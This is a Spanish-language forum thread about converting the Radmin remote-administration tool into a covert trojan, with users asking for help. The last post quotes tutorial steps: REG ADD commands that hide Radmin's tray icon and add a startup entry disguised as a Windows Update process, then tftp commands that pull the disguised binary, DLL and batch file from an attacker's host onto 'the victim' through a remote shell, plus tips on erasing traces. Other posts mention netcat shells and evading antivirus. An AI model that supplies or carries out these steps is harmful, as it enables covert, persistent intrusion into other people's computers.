Troyanizando Radmin 2.1 control remoto

Iniciado por octalh, 4 Febrero 2005, 11:59 AM

0 Miembros y 1 Visitante están viendo este tema.

super_ignorante

miren muchachones, ayudemne, lo k pasa que en este foro me parece no podr crear nuevos temas y me aparece como blokeado k pasa, algo hice mal para merecer esto????? talvez no sea el lugar correcto pero no me keda de otro

Vive la vida

pepe_piocha

cuando le doy en generar el autoejecutable me sale que falta un archivo run dll, ese que pedo hice algo mal????? casi lo termino solo me falta ese paso. ::)

txuben

Cita de: pepe_piocha en  3 Octubre 2007, 12:07 PM
cuando le doy en generar el autoejecutable me sale que falta un archivo run dll, ese que pedo hice algo mal????? casi lo termino solo me falta ese paso. ::)

Te falta el AdmDll.dll que está en la carpeta del Radmin  :¬¬




Pocket1

Bueno tengo un problemita perecido al anterior, segui todos los pasos, pero al querer generar me da un error me dice:

Error: No se encuentra el archivo runload.dll. No se puede comenzar la operacion sin esta archivo.

Pero si esta cargado el archivo AdmDll.dll

no se donde esta el error, por otro lado tengo un detalle, genere el archivo *.bat y al cargarlo en la pantalla principal de IPacker me aparece   Comandos (0)   , no se si sea ahi donde este el error, si alguien me puede ayudar, se lo agradezco.

alexkof158

buenas, retomando el tema que es bastante interesante, no he podido conectar el netcat ya que estoy como ante 2 routers entonces, mi duda es si se puede el net cat saltearse estos. entonces lo q hago es congiruar el netcat al puerto 6000 y el radmin al 4899
enontces cuando trato de entrar al radmin no me deja . el mismo error de que no deja conectar. en el foro he leido que hay que abrir los puertos, pero no tengo acceso a los routers.
alguna solucion gracias
"noproxy"

rafael_21

disculpen no entiendo el comando tftp por favor si alguien me lo puede explicar se los Agradecería, he tratado de subir los archivos al pc remoto pero me manda tiempo de espera agotado.

flow1flow

ola a todo el mundo ...perdonar por la pregunta pero .... eo estoy siguendo todo los pasos para troyanizar el radmin 2.1  y resulta que  al final me lo esta creando pero ... PERO    resulta que esta detectado como virus  asta mi antivirus que es avast ... y lo tengo desactualizado  me lo detecta como virus .... perdonar a todos pero llevo 3 dias y 3 noches para crealo y todo me sale siemmpre igual.... aver si ustedes me podeis sacar de la duda por favor     e echo el .bat  e cambiado todo igual que en el tutorial .... ... porva  necesito ayudsa

chicocos

Después de bastantes años, decidí hacerlo haber que tal ya que soy un completo n00b en esto... así que si pregunto cosas coherentes... LO SIENTO

Y mi duda es la siguiente:

Todo lo que copio a continuación entra dentro del .bat?

Citar6.-Bien ahora vamos a hacer un bat que nos agrege las llaves en el registro y que arranque a radmin con el inicio del sistema.

codigo:

Citar
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"

solo sustituyan los valores por los suyos.

7.-Subir archivos via tftp

una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:

Citar
tftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageado

Citar
tftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombre

Citar
tftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)


Por otro lado, cuando pone tftp -i xxx.xxx.xxx.xxx que se supone que debo poner en dichas xxx? Ojalá pudieran ayudarme después de tantos años... muchisimas gracias de antemano!! :)